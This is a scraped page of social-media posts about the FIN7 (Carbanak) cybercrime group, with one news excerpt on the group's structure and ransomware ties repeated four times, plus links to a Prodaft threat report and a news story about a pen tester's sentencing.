https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-16042023
#infosec #cyber #news #cybernews #infosec #infosecnews #informationsecurity #cybersecurity #hacking #security #technology #hacker #vulnerability #vulnerabilities #malware #ransomware #dfir #soc #threatintel #threatintelligence #darkweb #microsoft #azure #mfa #mfabypass #cobaltstrike #bloodhound #sharphound #byovd #ipfs #intune #GooglePlay #Android #zeroday #0day
-
From #THN: "An exhaustive analysis of #FIN7 has unmasked the #cybercrime syndicate's organizational hierarchy, alongside unraveling its role as an affiliate for mounting ransomware attacks.
It has also exposed deeper associations between the group and the larger threat ecosystem comprising the now-defunct #ransomware #DarkSide, #REvil, and #LockBit families.
The highly active threat group, also known as #Carbanak, is known for employing an extensive arsenal of tools and tactics to expand its "cybercrime horizons," including adding ransomware to its playbook and setting up fake security companies to lure researchers into conducting ransomware attacks under the guise of penetration testing.
https://thehackernews.com/2022/12/fin7-cybercrime-syndicate-emerges-as.html?_m=3n%2e009a%2e2920%2evo0ao07ax6%2e1w1s -
From #THN: "An exhaustive analysis of #FIN7 has unmasked the #cybercrime syndicate's organizational hierarchy, alongside unraveling its role as an affiliate for mounting ransomware attacks.
It has also exposed deeper associations between the group and the larger threat ecosystem comprising the now-defunct #ransomware #DarkSide, #REvil, and #LockBit families.
The highly active threat group, also known as #Carbanak, is known for employing an extensive arsenal of tools and tactics to expand its "cybercrime horizons," including adding ransomware to its playbook and setting up fake security companies to lure researchers into conducting ransomware attacks under the guise of penetration testing.
https://thehackernews.com/2022/12/fin7-cybercrime-syndicate-emerges-as.html?_m=3n%2e009a%2e2920%2evo0ao07ax6%2e1w1s -
From #THN: "An exhaustive analysis of #FIN7 has unmasked the #cybercrime syndicate's organizational hierarchy, alongside unraveling its role as an affiliate for mounting ransomware attacks.
It has also exposed deeper associations between the group and the larger threat ecosystem comprising the now-defunct #ransomware #DarkSide, #REvil, and #LockBit families.
The highly active threat group, also known as #Carbanak, is known for employing an extensive arsenal of tools and tactics to expand its "cybercrime horizons," including adding ransomware to its playbook and setting up fake security companies to lure researchers into conducting ransomware attacks under the guise of penetration testing.
https://thehackernews.com/2022/12/fin7-cybercrime-syndicate-emerges-as.html?_m=3n%2e009a%2e2920%2evo0ao07ax6%2e1w1s -
From #THN: "An exhaustive analysis of #FIN7 has unmasked the #cybercrime syndicate's organizational hierarchy, alongside unraveling its role as an affiliate for mounting ransomware attacks.
It has also exposed deeper associations between the group and the larger threat ecosystem comprising the now-defunct #ransomware #DarkSide, #REvil, and #LockBit families.
The highly active threat group, also known as #Carbanak, is known for employing an extensive arsenal of tools and tactics to expand its "cybercrime horizons," including adding ransomware to its playbook and setting up fake security companies to lure researchers into conducting ransomware attacks under the guise of penetration testing.
https://thehackernews.com/2022/12/fin7-cybercrime-syndicate-emerges-as.html?_m=3n%2e009a%2e2920%2evo0ao07ax6%2e1w1s -
Wow. This is an absolutely fascinating read by #Prodaft about #FIN7 and #ThreatIntel well worth the name.
I encourage everyone to take the time to browse and read this FREE report.
https://www.prodaft.com/resource/detail/fin7-unveiled-deep-dive-notorious-cybercrime-gang
-
“Pen tester” who helped FIN7 gang cause $1 billion damage, sentenced to five years behind bars https://www.bitdefender.com/blog/hotforsecurity/pen-tester-who-helped-fin7-gang-cause-1-billion-damage-sentenced-to-five-years-behind-bars/ #databreach #Guestblog #Law&order #Dataloss #Carbanak #Malware #FIN7